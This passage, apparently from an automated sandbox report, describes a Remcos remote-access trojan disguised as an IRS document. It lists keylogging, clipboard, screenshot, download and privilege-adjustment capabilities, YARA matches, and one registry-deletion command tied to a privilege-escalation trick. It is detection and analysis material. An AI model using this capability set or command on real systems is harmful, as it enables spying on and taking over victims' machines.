Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Del] 16_2_00185DA6
Contains functionality to register a low level keyboard hook
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_10536C29 SetWindowsHookExA 0000000D,004051AE,00000000,00000000 | 2_2_10536C29
Contains functionality to read data from the clipboard
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_0040D1E8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait | 2_2_0040D1E8
Contains functionality to read the clipboard data
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_0040D1E8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait | 2_2_0040D1E8
Contains functionality to record screenshots
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_0040F460 Sleep,CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,DeleteDC,DeleteDC,DeleteDC,DeleteObject,SelectObject,DeleteDC,DeleteDC,DeleteDC,DeleteObject,StretchBlt,DeleteDC,DeleteDC,DeleteDC,DeleteObject,DeleteObject,GetCursorInfo,GetIconInfo,DeleteObject,DeleteObject,DrawIcon,GetObjectA,DeleteDC,DeleteDC,DeleteDC,DeleteObject,LocalAlloc,GlobalAlloc,DeleteDC,DeleteDC,DeleteDC,DeleteObject,GetDIBits,DeleteDC,DeleteDC,DeleteDC,DeleteObject,GlobalFree,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,DeleteObject,GlobalFree,DeleteDC,DeleteDC,DeleteDC,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, | 2_2_0040F460
Potential key logger detected (key state polling based)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_00405221 GetKeyState,GetKeyState,GetKeyState,CallNextHookEx, | 2_2_00405221
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 16_2_00185221 GetKeyState,GetKeyState,GetKeyState,CallNextHookEx, | 16_2_00185221

E-Banking Fraud:

Yara detected Remcos RAT
Source: Yara match | File source: 00000010.00000002.1133899686.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.1130970018.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1152182250.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1156149653.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ieinstal.exe PID: 3740, type: MEMORY
Source: Yara match | File source: Process Memory Space: ieinstal.exe PID: 660, type: MEMORY
Source: Yara match | File source: 2.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.ieinstal.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.ieinstal.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to change the wallpaper
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_10544943 SystemParametersInfoW, | 2_2_10544943

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000010.00000002.1133899686.0000000010530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000010.00000002.1133899686.0000000010530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos Payload Author: kevoreilly
Source: 00000010.00000002.1130970018.0000000000180000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000010.00000002.1130970018.0000000000180000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos Payload Author: kevoreilly
Source: 00000002.00000002.1152182250.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000002.00000002.1152182250.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos Payload Author: kevoreilly
Source: 00000002.00000002.1156149653.0000000010530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000002.00000002.1156149653.0000000010530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos Payload Author: kevoreilly
Source: 2.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 2.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Source: 16.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 16.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Source: 16.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 16.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Source: 2.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 2.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Source: 16.2.ieinstal.exe.180000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 16.2.ieinstal.exe.180000.0.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Source: 16.2.ieinstal.exe.180000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 16.2.ieinstal.exe.180000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Contains functionality to call native functions
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_10545184 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA, | 2_2_10545184
Contains functionality to shutdown / reboot the system
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_0040D1E8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait | 2_2_0040D1E8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_1053F905 atoi,atoi,atoi,ExitWindowsEx,LoadLibraryA,GetProcAddress, | 2_2_1053F905
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 16_2_0018D1E8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@
std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai16_2_0018D1E8
Detected potential crypto function
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_0040D1E8
Source: C:\Users\Public\Kaphpos.exe | Code function: 15_3_02302658 (listed eight times in the report for the same function)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 16_2_0018D1E8
Found potential string decryption / allocating functions
Source: C:\Users\Public\Kaphpos.exe | Code function: String function: 02300277 appears 56 times
Source: C:\Users\Public\Kaphpos.exe | Code function: String function: 022FE2AC appears 64 times
Source: C:\Users\Public\Kaphpos.exe | Code function: String function: 02306A14 appears 48 times
Source: C:\Users\Public\Kaphpos.exe | Code function: String function: 022FC254 appears 36 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: String function: 00413956 appears 47 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: String function: 00193956 appears 47 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: String function: 105453B6 appears 47 times
PE file contains strange resources
Source: irs Doc Attached.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Kaphpos.exe.0.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Uses reg.exe to modify the Windows registry
Source: unknown | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Yara signature match
Every source below matched both rules; the rule metadata is given once, for the first source, and applies to all of them.
Source: 00000010.00000002.1133899686.0000000010530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants (Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda)
Source: 00000010.00000002.1133899686.0000000010530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos_1 (author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload)
Source: 00000010.00000002.1130970018.0000000000180000.00000040.00000001.sdmp, type: MEMORY | Matched rules: REMCOS_RAT_variants, Remcos_1
Source: 00000002.00000002.1152182250.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rules: REMCOS_RAT_variants, Remcos_1
Source: 00000002.00000002.1156149653.0000000010530000.00000040.00000001.sdmp, type: MEMORY | Matched rules: REMCOS_RAT_variants, Remcos_1
Source: 2.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE | Matched rules: REMCOS_RAT_variants, Remcos_1
Source: 16.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE | Matched rules: REMCOS_RAT_variants, Remcos_1
Source: 16.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE | Matched rules: REMCOS_RAT_variants, Remcos_1
Source: 2.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE | Matched rules: REMCOS_RAT_variants, Remcos_1
Source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rules: REMCOS_RAT_variants, Remcos_1
Source: 16.2.ieinstal.exe.180000.0.unpack, type: UNPACKEDPE | Matched rules: REMCOS_RAT_variants, Remcos_1
Source: 16.2.ieinstal.exe.180000.0.raw.unpack, type: UNPACKEDPE | Matched rules: REMCOS_RAT_variants, Remcos_1
Source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rules: REMCOS_RAT_variants, Remcos_1
Classification label
Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@28/7@5/2
Contains functionality to adjust token privileges (e.g. debug / backup)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_0040EB33 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_10540593 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 16_2_0018EB33 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Contains functionality to check free disk space
Source: C:\Users\Public\Kaphkos.exe | Code function: 12_2_00405B40 GetDiskFreeSpaceA
Contains functionality to enum processes or threads
